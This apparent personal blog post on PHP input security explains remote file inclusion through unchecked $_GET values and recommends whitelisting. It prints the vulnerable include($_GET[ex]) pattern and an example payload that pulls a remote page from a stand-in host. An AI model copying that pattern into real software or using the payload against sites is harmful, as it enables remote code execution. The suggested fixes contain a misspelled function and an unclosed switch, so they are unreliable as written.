sometimes a cigar is just a cigar
Header image

Php Get Security

Posted by ALonon in Security

It is very important to check your data that you take with $_GET before use.

You can use $_Get in some cases , in each case there are some different measures to be taken.

For example if you use sth like that

if(isset($_GET[ex]))

   include($_GET[ex]);

If you use this codes, bad users can include any page that they want in your web page

?ex=http://www.example.com/bad_page.php

With this they can include any page that they want.

$operation =array('add','delete','edit','save');

if (in_arrray($_GET[ex],$operation))

.. make sth...

Also you can use switch,or if..

switch($_GET[ex]){
case 'add':  something...
break;
case 'delete': something...
break;
default: something...

with if

if($_GET[ex] == "add"){

Do something..
}

else if($_GET[ex] =="delete"){
Do something..
}

else
die("possible hack attempt");

, ,

You can follow any responses to this entry through the RSS 2.0 You can leave a response, or trackback.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>